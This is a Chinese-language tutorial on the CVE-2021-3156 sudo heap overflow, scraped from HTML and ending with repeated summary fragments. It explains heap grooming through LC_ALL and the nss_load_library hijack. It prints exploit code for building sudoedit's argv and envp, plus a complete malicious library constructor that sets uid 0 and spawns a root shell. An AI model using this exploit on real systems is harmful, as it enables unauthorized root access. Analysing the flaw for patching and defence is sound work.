CVE-2021-3156 Linux sudo提权漏洞分析与利用教学文档<\/h1>

漏洞概述<\/h2>
CVE-2021-3156是Linux sudo工具中的一个堆缓冲区溢出漏洞，由Qualys安全团队发现并报告。该漏洞存在于sudo的sudoedit功能中，允许本地攻击者在无需密码的情况下获得root权限。漏洞影响范围广泛，几乎所有主流Linux发行版都受到影响。<\/p>

漏洞原理<\/h2>

漏洞根源<\/h3>

漏洞源于sudo在处理命令行参数时，当以shell模式(-s或-i选项)运行时，未能正确转义反斜杠字符，导致堆缓冲区溢出。具体来说：<\/p>

当sudo以-s<\/code>或-i<\/code>选项运行时，会进入"shell模式"<\/li>
在此模式下，sudo错误地处理了命令行参数中的反斜杠字符<\/li>

攻击者可以构造特殊的命令行参数和环境变量组合，导致堆溢出<\/li>
<\/ol>
关键函数调用链<\/h3>

setlocale(LC_ALL, "")<\/code> - 配置本机字符集<\/li>
get_user_info()<\/code> - 获取用户信息<\/li>
set_cmnd()<\/code> - 设置命令参数<\/li>
<\/ol>
漏洞利用分析<\/h2>
环境准备<\/h3>
利用该漏洞需要控制以下两个部分：<\/p>

命令行参数：通过构造特殊的参数触发溢出<\/li>
环境变量：通过精心设计的LC_ALL环境变量控制堆布局<\/li>
<\/ol>
堆布局控制<\/h3>
利用的关键在于通过setlocale()<\/code>和get_user_info()<\/code>控制堆布局：<\/p>

使用setlocale(LC_ALL, "C.UTF-8@AA.....AAA")<\/code>生成大的tcache块<\/li>
在get_user_info()<\/code>调用过程中会进行多次堆分配<\/li>
最终在service_user<\/code>结构体前产生一个0x80的free块<\/li>
<\/ol>
溢出构造<\/h3>


构造argv参数：<\/p>
char<\/span> *<\/span>s_argv[] =<\/span> {
<\/span><\/span>    "sudoedit"<\/span>, "-s"<\/span>, smash_a, "<\/span>\\<\/span>"<\/span>, smash_b, NULL
<\/span><\/span>};
<\/span><\/span><\/code><\/pre>其中smash_a<\/code>和smash_b<\/code>是填充特定长度的字符串<\/p>
<\/li>

构造envp环境变量：<\/p>
char<\/span> *<\/span>s_envp[MAX_ENVP];
<\/span><\/span>for<\/span>(int<\/span> i =<\/span> 0<\/span>; i <<\/span> target-><\/span>null_stomp_len; i++<\/span>) {
<\/span><\/span>    s_envp[envp_pos++<\/span>] =<\/span> "<\/span>\\<\/span>"<\/span>;
<\/span><\/span>}
<\/span><\/span>s_envp[envp_pos++<\/span>] =<\/span> "X\/P0P_SH3LLZ_"<\/span>;
<\/span><\/span>char<\/span> *<\/span>lc_all =<\/span> calloc(target-><\/span>lc_all_len +<\/span> 16<\/span>, 1<\/span>);
<\/span><\/span>strcpy(lc_all, "LC_ALL=C.UTF-8@"<\/span>);
<\/span><\/span>memset(lc_all+<\/span>15<\/span>, 'C'<\/span>, target-><\/span>lc_all_len);
<\/span><\/span>s_envp[envp_pos++<\/span>] =<\/span> lc_all;
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
提权机制<\/h3>
利用nss_load_library<\/code>机制加载恶意库：<\/p>

溢出修改service_user<\/code>结构体中的name<\/code>字段<\/li>
当sudo调用getgrgid()<\/code>时会触发nss_load_library<\/code><\/li>
nss_load_library<\/code>会加载我们指定的恶意库<\/li>
恶意库的_init<\/code>构造函数中执行提权操作<\/li>
<\/ol>
恶意库示例：<\/p>
#include<\/span> <unistd.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span>
<\/span><\/span><\/span>#include<\/span> <string.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>static<\/span> void<\/span> __attribute__<\/span> ((constructor)) _init(void<\/span>);
<\/span><\/span>
<\/span><\/span>static<\/span> void<\/span> _init<\/span>(void<\/span>) {
<\/span><\/span>    printf("[+] bl1ng bl1ng! We got it!<\/span>\n<\/span>"<\/span>);
<\/span><\/span>    setuid(0<\/span>); seteuid(0<\/span>); setgid(0<\/span>); setegid(0<\/span>);
<\/span><\/span>    static<\/span> char<\/span> *<\/span>a_argv[] =<\/span> { "sh"<\/span>, NULL };
<\/span><\/span>    static<\/span> char<\/span> *<\/span>a_envp[] =<\/span> { "PATH=\/bin:\/usr\/bin:\/sbin"<\/span>, NULL };
<\/span><\/span>    execv("\/bin\/sh"<\/span>, a_argv);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞利用步骤<\/h2>

构造argv和envp参数<\/li>
调用execve<\/code>执行sudoedit<\/li>
触发堆溢出，覆盖service_user<\/code>结构体<\/li>
通过nss_load_library<\/code>加载恶意库<\/li>
恶意库的构造函数执行提权操作<\/li>
<\/ol>
受影响版本<\/h2>

Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27<\/li>
Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31<\/li>
Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28<\/li>
<\/ul>
防护措施<\/h2>

升级sudo到已修复版本<\/li>
应用厂商提供的补丁<\/li>
限制sudo的使用权限<\/li>
<\/ol>
参考链接<\/h2>

CVE-2021-3156调试分析<\/a><\/li>
CVE-2021-3156 sudo堆溢出分析与利用<\/a><\/li>
cve-2021-3156分析<\/a><\/li>
Sudo Exploit Writeup<\/a><\/li>
Heap-based buffer overflow in Sudo (CVE-2021-3156)<\/a><\/li>
<\/ol>
总结<\/h2>
CVE-2021-3156是一个严重的本地提权漏洞，利用难度较高但影响广泛。理解其原理和利用方式有助于更好地防御此类漏洞。系统管理员应及时更新sudo软件包，用户也应避免运行不可信的sudo命令。<\/p>

CVE-2021-3156 Linux sudo提权漏洞分析与利用教学文档<\/h1>

漏洞原理<\/h2>

漏洞利用分析<\/h2>

总结<\/h2> CVE-2021-3156是一个严重的本地提权漏洞，利用难度较高但影响广泛。理解其原理和利用方式有助于更好地防御此类漏洞。系统管理员应及时更新sudo软件包，用户也应避免运行不可信的sudo命令。<\/p>

总结<\/h2>
CVE-2021-3156是一个严重的本地提权漏洞，利用难度较高但影响广泛。理解其原理和利用方式有助于更好地防御此类漏洞。系统管理员应及时更新sudo软件包，用户也应避免运行不可信的sudo命令。<\/p>